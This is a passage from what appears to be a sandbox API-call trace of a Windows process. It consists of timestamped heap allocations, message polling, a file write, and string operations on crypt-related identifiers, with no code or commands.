lpMsg=0x8ceef8) returned 0 [0133.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0133.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0133.803] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0133.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0133.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0133.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0133.803] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0133.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0133.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0133.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0133.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0133.803] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0133.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0133.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0133.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0133.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0133.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0133.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0133.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0133.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0133.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0133.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0133.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0133.805] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0133.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0133.805] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0133.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0133.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0133.805] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0133.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0133.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0133.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0133.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0133.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0133.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0133.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0133.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0133.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0133.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0133.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13fc0) returned 0x2ed0250 [0133.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0133.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0133.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13fc0) returned 0x2ef81e0 [0133.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0133.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0133.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed0250 | out: hHeap=0x970000) returned 1 [0133.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0133.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0133.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0133.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0133.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0133.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13fc0) returned 0x2ed0250 [0133.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ef81e0 | out: hHeap=0x970000) returned 1 [0133.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0133.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0133.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13fc0) returned 0x2ef81e0 [0133.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed0250 | out: hHeap=0x970000) returned 1 [0133.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0133.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0133.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0133.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0133.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0133.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0133.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0133.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0133.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0133.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0133.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0133.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0133.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0133.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0133.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0133.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0133.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0133.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0133.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0133.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0133.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0133.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0133.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0133.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0133.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0133.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0133.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0133.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0133.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0133.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0133.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0133.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0133.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0133.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ebc288 | out: hHeap=0x970000) returned 1 [0133.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0133.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0133.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0133.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0133.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0133.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0133.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0133.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0133.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0133.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0133.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0133.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0133.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0133.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0133.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0133.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0133.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0133.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea82c0 | out: hHeap=0x970000) returned 1 [0133.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0133.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0133.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0133.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0133.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0133.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ee4218 | out: hHeap=0x970000) returned 1 [0133.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0133.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0133.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0133.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0133.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0133.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0133.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0133.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0133.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0133.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0133.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0133.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0133.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0133.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0133.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0133.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0133.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0133.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0133.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e942f8 | out: hHeap=0x970000) returned 1 [0133.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0133.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0133.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13fc0) returned 0x2e80330 [0133.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ef81e0 | out: hHeap=0x970000) returned 1 [0133.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.951] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0133.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0133.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0133.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0133.951] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0133.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0133.951] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0133.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0133.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0133.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0133.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0133.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0133.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0133.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13fc0) returned 0x2e942f8 [0134.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0134.073] WriteFile (in: hFile=0x2d0, lpBuffer=0x2e942f8*, nNumberOfBytesToWrite=0x13fc0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2e942f8*, lpNumberOfBytesWritten=0x8cf5e4*=0x13fc0, lpOverlapped=0x0) returned 1 [0134.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0134.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e942f8 | out: hHeap=0x970000) returned 1 [0134.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0134.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0134.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0134.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0134.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0134.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0134.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0134.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0134.078] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0134.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0134.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0134.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0134.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0134.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0134.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0134.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0134.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0134.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0134.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0134.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0134.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0134.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0134.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0134.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0134.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0134.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0134.079] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0134.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0134.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0134.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0134.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d68 [0134.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0134.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0134.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0134.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0134.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0134.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0134.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0134.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0134.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0134.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0134.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0134.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0134.079] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0134.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0134.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0134.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0134.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0134.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0134.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0134.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0134.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0134.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0134.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0134.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0134.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0134.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0134.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0134.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0134.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0134.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0134.080] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0134.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0134.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0134.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0134.080] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0134.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0134.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0134.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0134.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: 